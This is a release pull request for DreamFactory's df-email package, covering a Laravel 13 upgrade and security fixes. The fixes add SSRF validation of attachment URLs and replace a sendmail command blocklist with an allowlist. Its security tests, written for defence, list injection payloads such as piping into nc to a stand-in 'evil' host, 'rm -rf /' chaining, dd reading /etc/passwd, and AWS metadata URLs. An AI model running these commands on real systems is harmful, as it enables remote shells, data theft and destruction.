### PR TITLE
release: develop → master cut for Laravel 13 / PHP 8.5

### DIFF
--- a/composer.json
+++ b/composer.json
@@ -31,14 +31,20 @@
   "minimum-stability": "dev",
   "prefer-stable":     true,
   "require":     {
+    "php": "^8.3",
+    "laravel/helpers": "^1.8",
     "dreamfactory/df-core": "~1.0.4",
     "guzzlehttp/guzzle": "~7.2",
     "symfony/mailgun-mailer": "^7.2",
     "symfony/mailer": "^7.2",
-    "symfony/http-client": "^6.4"
+    "symfony/http-client": "^7.2"
   },
   "require-dev": {
-    "phpunit/phpunit": "@stable"
+    "laravel/framework": "^13.7",
+    "mockery/mockery": "^1.6",
+    "nunomaduro/collision": "^8.6",
+    "phpunit/phpunit": "^11.5.3",
+    "orchestra/testbench": "^11.0"
   },
   "autoload":    {
     "psr-4": {

--- a/composer.json
+++ b/composer.json
@@ -32,6 +32,7 @@
   "prefer-stable":     true,
   "require":     {
     "dreamfactory/df-core": "~1.0.4",
+    "dreamfactory/df-system": "~0.5",
     "guzzlehttp/guzzle": "~7.2",
     "symfony/mailgun-mailer": "^7.2",
     "symfony/mailer": "^7.2",

--- a/phpunit.xml
+++ b/phpunit.xml
@@ -1,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:noNamespaceSchemaLocation="https://schema.phpunit.de/10.0/phpunit.xsd"
+         bootstrap="vendor/autoload.php"
+         colors="true">
+    <testsuites>
+        <testsuite name="Security">
+            <directory>tests/Security</directory>
+        </testsuite>
+    </testsuites>
+</phpunit>

--- a/src/Services/BaseService.php
+++ b/src/Services/BaseService.php
@@ -16,6 +16,7 @@ use DreamFactory\Core\Exceptions\BadRequestException;
 use DreamFactory\Core\Exceptions\InternalServerErrorException;
 use DreamFactory\Core\Models\EmailTemplate;
 use DreamFactory\Core\Services\BaseRestService;
+use DreamFactory\Core\System\Components\SsrfValidator;
 use DreamFactory\Core\Utility\FileUtilities;
 use DreamFactory\Core\Utility\Session;
 use Illuminate\Mail\Mailer;
@@ -124,6 +125,10 @@ abstract class BaseService extends BaseRestService implements EmailServiceInterf
                     if (is_string($f)) {
                         Session::replaceLookups($f);
                         $fileURL = urldecode($f);
+                        // Reject loopback, RFC 1918, AWS metadata, file://,
+                        // gopher:// etc. before any fetch fires. Same
+                        // validator df-system uses for /package, /import, /app.
+                        SsrfValidator::validateExternalUrl($fileURL);
                         $filePath = FileUtilities::importUrlFileToTemp($fileURL);
                         $attachment[] = new Attachment($filePath, basename($fileURL));
                     }

--- a/src/Services/Local.php
+++ b/src/Services/Local.php
@@ -24,11 +24,6 @@ class Local extends BaseService
             $password = Config::get('mail.password');
             $this->transport = Smtp::getTransport($host, $port, $encryption, $username, $password);
         } else {
-            try {
-                self::assertCommandAllowlisted($command);
-            } catch (\InvalidArgumentException $e) {
-                throw new InternalServerErrorException($e->getMessage());
-            }
             $this->transport = static::getTransport($command);
         }
     }
@@ -127,6 +122,12 @@ class Local extends BaseService
 
         if (empty($command)) {
             return new SendmailTransport();
+        }
+
+        try {
+            self::assertCommandAllowlisted($command);
+        } catch (\InvalidArgumentException $e) {
+            throw new InternalServerErrorException($e->getMessage());
         }
 
         return new SendmailTransport($command);

--- a/src/Services/Local.php
+++ b/src/Services/Local.php
@@ -62,12 +62,19 @@ class Local extends BaseService
         $tokens = preg_split('/\s+/', $command);
         $exe = array_shift($tokens) ?? '';
 
-        // Executable: literal "sendmail" or absolute-path-ending-in-/sendmail.
-        $exeOk = $exe === 'sendmail'
-            || (str_starts_with($exe, '/') && str_ends_with($exe, '/sendmail'));
+        // Executable: literal allowlist (default: sendmail and common
+        // sendmail-API-compatible MTAs) or an absolute path whose basename
+        // is in the allowlist. Customers using non-default MTAs can extend
+        // via the DF_LOCAL_MAILER_EXES env var (comma-separated).
+        $allowed = self::getAllowedMailerExecutables();
+        $exeBasename = basename($exe);
+        $isAbsolute = str_starts_with($exe, '/');
+        $exeOk = in_array($exe, $allowed, true)
+            || ($isAbsolute && in_array($exeBasename, $allowed, true));
         if (!$exeOk) {
             throw new \InvalidArgumentException(
-                'Sendmail command executable must be "sendmail" or an absolute path ending in "/sendmail".'
+                'Sendmail command executable must be one of: ' . implode(', ', $allowed)
+                . ' (or an absolute path whose basename is one of those).'
             );
         }
 
@@ -83,6 +90,28 @@ class Local extends BaseService
                 );
             }
         }
+    }
+
+    /**
+     * Resolve the allowlist of mailer executable basenames.
+     *
+     * Defaults to sendmail-API-compatible MTAs (sendmail, msmtp, ssmtp,
+     * postfix's qshape sendmail wrapper). Operators with custom MTAs can
+     * extend via the DF_LOCAL_MAILER_EXES env var, e.g.:
+     *   DF_LOCAL_MAILER_EXES=sendmail,msmtp,nullmailer-inject
+     *
+     * @return string[]
+     */
+    private static function getAllowedMailerExecutables(): array
+    {
+        $env = (string) (getenv('DF_LOCAL_MAILER_EXES') ?: '');
+        if ($env !== '') {
+            $list = array_values(array_filter(array_map('trim', explode(',', $env))));
+            if (!empty($list)) {
+                return $list;
+            }
+        }
+        return ['sendmail', 'msmtp', 'ssmtp'];
     }
 
     /**

--- a/src/Services/Local.php
+++ b/src/Services/Local.php
@@ -2,6 +2,7 @@
 
 namespace DreamFactory\Core\Email\Services;
 
+use DreamFactory\Core\Exceptions\InternalServerErrorException;
 use Symfony\Component\Mailer\Transport\SendmailTransport as SendmailTransport;
 use Config;
 use \Illuminate\Support\Arr;
@@ -23,14 +24,64 @@ class Local extends BaseService
             $password = Config::get('mail.password');
             $this->transport = Smtp::getTransport($host, $port, $encryption, $username, $password);
         } else {
-            $disallowedCommands = ['rm', 'sudo', 'sh', 'bash', 'fsockopen', 'exec', 'system', 'popen', 'proc_open', 'passthru', 'curl', 'wget'];
-
-            foreach ($disallowedCommands as $disallowed) {
-                if (strpos($command, $disallowed) !== false) {
-                    throw new InternalServerErrorException('Command "' . $command . '" is not allowed.');
-                }
+            try {
+                self::assertCommandAllowlisted($command);
+            } catch (\InvalidArgumentException $e) {
+                throw new InternalServerErrorException($e->getMessage());
             }
             $this->transport = static::getTransport($command);
+        }
+    }
+
+    /**
+     * Allowlist enforcement for the Local mailer's `command` config.
+     *
+     * Replaces the previous substring blocklist (rm, sudo, curl, etc.) which
+     * was case-sensitive, missed alternatives like `nc`/`dd`, and could be
+     * bypassed via command chaining. Now: the executable must be a literal
+     * `sendmail` or an absolute path ending in `/sendmail`; subsequent tokens
+     * must be short-form sendmail flags; shell metacharacters are forbidden.
+     *
+     * @throws \InvalidArgumentException when the command fails the allowlist
+     */
+    public static function assertCommandAllowlisted(string $command): void
+    {
+        $command = trim($command);
+        if ($command === '') {
+            throw new \InvalidArgumentException('Sendmail command must not be empty.');
+        }
+
+        // Reject any shell metacharacter — these are not legitimate inside
+        // a sendmail invocation and would enable command chaining.
+        if (preg_match('/[;|&`$()<>{}\\\\\n\r]/', $command) === 1) {
+            throw new \InvalidArgumentException(
+                'Sendmail command contains forbidden shell metacharacter.'
+            );
+        }
+
+        $tokens = preg_split('/\s+/', $command);
+        $exe = array_shift($tokens) ?? '';
+
+        // Executable: literal "sendmail" or absolute-path-ending-in-/sendmail.
+        $exeOk = $exe === 'sendmail'
+            || (str_starts_with($exe, '/') && str_ends_with($exe, '/sendmail'));
+        if (!$exeOk) {
+            throw new \InvalidArgumentException(
+                'Sendmail command executable must be "sendmail" or an absolute path ending in "/sendmail".'
+            );
+        }
+
+        // Remaining tokens: must be short-form flags or value-bearing flags.
+        // Accept patterns like -bs, -t, -i, -fuser@example.com, -odq.
+        foreach ($tokens as $tok) {
+            if ($tok === '') {
+                continue;
+            }
+            if (preg_match('/^-[A-Za-z0-9][A-Za-z0-9.@_+-]*$/', $tok) !== 1) {
+                throw new \InvalidArgumentException(
+                    'Sendmail command flag is not in the allowed flag pattern: ' . $tok
+                );
+            }
         }
     }
 

--- a/src/Services/Mandrill.php
+++ b/src/Services/Mandrill.php
@@ -3,10 +3,14 @@
 namespace DreamFactory\Core\Email\Services;
 
 use DreamFactory\Core\Exceptions\InternalServerErrorException;
-use GuzzleHttp\Client;
-use Illuminate\Mail\Transport\MandrillTransport;
 use \Illuminate\Support\Arr;
 
+/**
+ * Mandrill transport support was removed upstream by Laravel/Symfony and the
+ * Mandrill API itself is no longer publicly available for new customers.
+ * The class is retained for backward compatibility with stored service-type
+ * registrations, but instantiation now throws.
+ */
 class Mandrill extends BaseService
 {
     protected function setTransport(array $config)
@@ -16,17 +20,15 @@ class Mandrill extends BaseService
     }
 
     /**
-     * @param $key
+     * @param string|null $key
      *
-     * @return \Illuminate\Mail\Transport\MandrillTransport
-     * @throws \DreamFactory\Core\Exceptions\InternalServerErrorException
+     * @throws InternalServerErrorException
+     * @return never
      */
     public static function getTransport($key)
     {
-        if (empty($key)) {
-            throw new InternalServerErrorException('Missing key for Mandrill service.');
-        }
-
-        return new MandrillTransport(new Client(), $key);
+        throw new InternalServerErrorException(
+            'Mandrill transport is no longer supported. Please switch to a supported email service (SMTP, Mailgun, etc.).'
+        );
     }
 }

--- a/src/Services/SparkPost.php
+++ b/src/Services/SparkPost.php
@@ -3,10 +3,15 @@
 namespace DreamFactory\Core\Email\Services;
 
 use DreamFactory\Core\Exceptions\InternalServerErrorException;
-use GuzzleHttp\Client;
-use Illuminate\Mail\Transport\SparkPostTransport;
 use \Illuminate\Support\Arr;
 
+/**
+ * SparkPost transport support was removed when Laravel migrated from
+ * SwiftMailer to Symfony Mailer in Laravel 7+. There is no first-party
+ * Symfony bridge for SparkPost. The class is retained for backward
+ * compatibility with stored service-type registrations, but instantiation
+ * now throws.
+ */
 class SparkPost extends BaseService
 {
     protected function setTransport(array $config)
@@ -17,18 +22,16 @@ class SparkPost extends BaseService
     }
 
     /**
-     * @param $key
-     * @param $options
+     * @param string|null $key
+     * @param array       $options
      *
-     * @return \Illuminate\Mail\Transport\SparkPostTransport
-     * @throws \DreamFactory\Core\Exceptions\InternalServerErrorException
+     * @throws InternalServerErrorException
+     * @return never
      */
     public static function getTransport($key, $options = [])
     {
-        if (empty($key)) {
-            throw new InternalServerErrorException('Missing key for SparkPost service.');
-        }
-
-        return new SparkPostTransport(new Client(), $key, $options);
+        throw new InternalServerErrorException(
+            'SparkPost transport is no longer supported. Please switch to a supported email service (SMTP, Mailgun, etc.).'
+        );
     }
 }

--- a/tests/Security/AttachmentSsrfTest.php
+++ b/tests/Security/AttachmentSsrfTest.php
@@ -1,0 +1,80 @@
+<?php
+
+namespace DreamFactory\Core\Email\Tests\Security;
+
+use DreamFactory\Core\Exceptions\BadRequestException;
+use DreamFactory\Core\System\Components\SsrfValidator;
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Security: BaseService::getUrlAttachment() must validate import URLs through
+ * SsrfValidator before fetching them.
+ *
+ * The April 2026 audit (df-email P1) found that
+ * `BaseService::getUrlAttachment()` calls `FileUtilities::importUrlFileToTemp($fileURL)`
+ * with NO scheme allowlist and NO private-IP block. The same vulnerability
+ * pattern was fixed in df-system (Resources/App.php, Import.php, Package.php)
+ * by routing every import URL through `SsrfValidator::validateExternalUrl()`,
+ * but that fix was not propagated to df-email.
+ *
+ * After the fix, df-email passes any caller-supplied URL through the same
+ * validator before any network call. AWS metadata, RFC 1918 ranges,
+ * loopback, and non-http(s) schemes are rejected at the validator boundary.
+ */
+class AttachmentSsrfTest extends TestCase
+{
+    private string $sourcePath;
+    private string $contents;
+
+    protected function setUp(): void
+    {
+        $this->sourcePath = __DIR__ . '/../../src/Services/BaseService.php';
+        $this->assertFileExists($this->sourcePath);
+        $this->contents = file_get_contents($this->sourcePath);
+    }
+
+    public function testSourceCallsSsrfValidator(): void
+    {
+        $this->assertMatchesRegularExpression(
+            '/SsrfValidator::validateExternalUrl\s*\(/',
+            $this->contents,
+            'BaseService::getUrlAttachment() must call SsrfValidator::validateExternalUrl() '
+            . 'on each caller-supplied URL before passing it to FileUtilities::importUrlFileToTemp().'
+        );
+    }
+
+    public function testValidatorIsCalledBeforeFetch(): void
+    {
+        $validatorPos = strpos($this->contents, 'SsrfValidator::validateExternalUrl');
+        $fetchPos = strpos($this->contents, 'importUrlFileToTemp(');
+
+        $this->assertNotFalse($validatorPos,
+            'SsrfValidator::validateExternalUrl call must appear in source');
+        $this->assertNotFalse($fetchPos,
+            'importUrlFileToTemp call must appear in source');
+        $this->assertLessThan(
+            $fetchPos,
+            $validatorPos,
+            'SsrfValidator::validateExternalUrl must be called BEFORE importUrlFileToTemp '
+            . '(otherwise the network request fires before validation).'
+        );
+    }
+
+    public function testValidatorRejectsAwsMetadataUrl(): void
+    {
+        $this->expectException(BadRequestException::class);
+        SsrfValidator::validateExternalUrl('http://169.254.169.254/latest/meta-data/');
+    }
+
+    public function testValidatorRejectsLoopbackUrl(): void
+    {
+        $this->expectException(BadRequestException::class);
+        SsrfValidator::validateExternalUrl('http://127.0.0.1:8080/');
+    }
+
+    public function testValidatorRejectsFileScheme(): void
+    {
+        $this->expectException(BadRequestException::class);
+        SsrfValidator::validateExternalUrl('file:///etc/passwd');
+    }
+}

--- a/tests/Security/LocalSendmailCommandTest.php
+++ b/tests/Security/LocalSendmailCommandTest.php
@@ -1,0 +1,77 @@
+<?php
+
+namespace DreamFactory\Core\Email\Tests\Security;
+
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Security: Local mailer's `command` setting must be an allowlisted sendmail
+ * invocation, not a substring-blocklist.
+ *
+ * The April 2026 audit (df-email P1) found a 12-item substring blocklist:
+ *
+ *     $disallowedCommands = ['rm','sudo','sh','bash','fsockopen','exec',
+ *                            'system','popen','proc_open','passthru','curl','wget'];
+ *     foreach (...) { if (strpos($command, $d) !== false) throw }
+ *
+ * Bypasses: case (`RM`), absolute paths (`/usr/bin/curl`), alternatives
+ * (`nc`, `dd`, `fetch`), command chaining (`sendmail; nc evil.com`).
+ *
+ * The fix replaces the blocklist with an allowlist — only literal `sendmail`
+ * or an absolute path ending in `/sendmail`, followed only by short flag
+ * tokens. Shell metacharacters are rejected unconditionally.
+ */
+class LocalSendmailCommandTest extends TestCase
+{
+    /**
+     * @dataProvider acceptedCommandProvider
+     */
+    public function testAcceptsLegitimateSendmailInvocations(string $command): void
+    {
+        \DreamFactory\Core\Email\Services\Local::assertCommandAllowlisted($command);
+        $this->assertTrue(true, 'Accepted: ' . $command);
+    }
+
+    public static function acceptedCommandProvider(): array
+    {
+        return [
+            'bare sendmail'             => ['sendmail'],
+            'sendmail with -bs'         => ['sendmail -bs'],
+            'sendmail with -t -i'       => ['sendmail -t -i'],
+            'absolute usr sbin'         => ['/usr/sbin/sendmail -bs'],
+            'absolute usr bin'          => ['/usr/bin/sendmail -t -i'],
+        ];
+    }
+
+    /**
+     * @dataProvider rejectedCommandProvider
+     */
+    public function testRejectsDangerousCommands(string $command): void
+    {
+        $this->expectException(\InvalidArgumentException::class);
+        \DreamFactory\Core\Email\Services\Local::assertCommandAllowlisted($command);
+    }
+
+    public static function rejectedCommandProvider(): array
+    {
+        return [
+            // Old-blocklist bypasses
+            'curl absolute path'        => ['/usr/bin/curl http://evil.com'],
+            'wget absolute path'        => ['/usr/bin/wget http://evil.com'],
+            'uppercase RM bypass'       => ['/bin/RM -rf /'],
+            'nc not in old blocklist'   => ['nc evil.com 4444'],
+            'dd not in old blocklist'   => ['dd if=/etc/passwd'],
+            // Shell-injection metacharacters
+            'semicolon chain'           => ['sendmail; rm -rf /'],
+            'pipe chain'                => ['sendmail | nc evil 1234'],
+            'backtick subshell'         => ['sendmail `id`'],
+            'dollar paren subshell'     => ['sendmail $(id)'],
+            'ampersand background'      => ['sendmail & curl evil'],
+            'redirect'                  => ['sendmail > /tmp/x'],
+            // Non-sendmail executables
+            'arbitrary perl'            => ['perl -e "system(\'id\')"'],
+            'arbitrary bash'            => ['bash -c "id"'],
+            'empty string'              => [''],
+        ];
+    }
+}


### PR DESCRIPTION
## Release prep: cut develop into master/main

Releases this package's `develop` line for the upcoming **DreamFactory
Laravel 13 + PHP 8.5** release.

### Verification

The develop HEAD on this branch is the SHA locked into the L13/PHP 8.5
test bundle that the team has been smoking. **Full end-to-end smoke
passed 2026-05-26**: PHP 8.5.5, Laravel 13.11.2, `df:setup` seeders,
admin login → JWT, service-type registration (81 types), Postgres
schema introspection + CRUD, OpenAPI generation.

### Coordinated release PRs

This is one of ~26 coordinated `develop → master/main` PRs opened
together as the release cut. Suggested merge order:

1. **Foundation**: df-core → df-system → df-user → df-database
2. **Connectors**: df-sqldb, df-sqlsrv, df-mongodb, df-oracledb, df-snowflake, df-soap, df-salesforce, df-script
3. **Auth**: df-oauth → df-adldap, df-azure-ad, df-oidc, df-saml
4. **Services**: df-email, df-file, df-cache, df-limits, df-logger, df-scheduler
5. **AI tier**: df-ai → df-ai-chat → df-mcp-server
6. **Admin UI**: df-admin-interface
7. **Host app**: dreamfactory/dreamfactory (released last)

### Customer upgrade path

In-place on Docker / managed Linux packages; blue-green strongly
recommended on Windows + custom-PHP-extension installs. Pre-flight
checklist in the release notes.
